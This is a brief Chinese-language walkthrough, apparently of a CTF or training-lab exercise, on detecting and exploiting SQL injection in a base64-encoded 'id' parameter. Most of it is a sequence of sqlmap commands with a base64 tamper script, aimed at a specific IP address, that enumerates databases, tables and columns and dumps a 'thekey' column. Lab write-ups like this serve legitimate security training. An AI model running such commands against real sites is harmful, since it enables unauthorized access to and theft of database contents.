一、粗略判断是否存在sql注入
1.访问链接:http://219.153.49.228:40602/
id=MQo= ------->有可能存在sql注入,并且看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1
二、kali虚拟机精确判断
需注意(网站id采用的是base64加密的结果 故用sqlmap注入时也必须先用base64加密)
1.判断网站是否存在sql注入漏洞(设置level=4)
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4
2.查看该网站下的数据库
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --dbs
3.查看该网站当前使用的数据库
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --current-db
4.查看当前使用数据库下面的表
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test --tables
5.查看敏感表中的列名
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data --columns
6.爆破敏感列名下的元素
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data -C thekey --dump
得到key,SQL注入成功!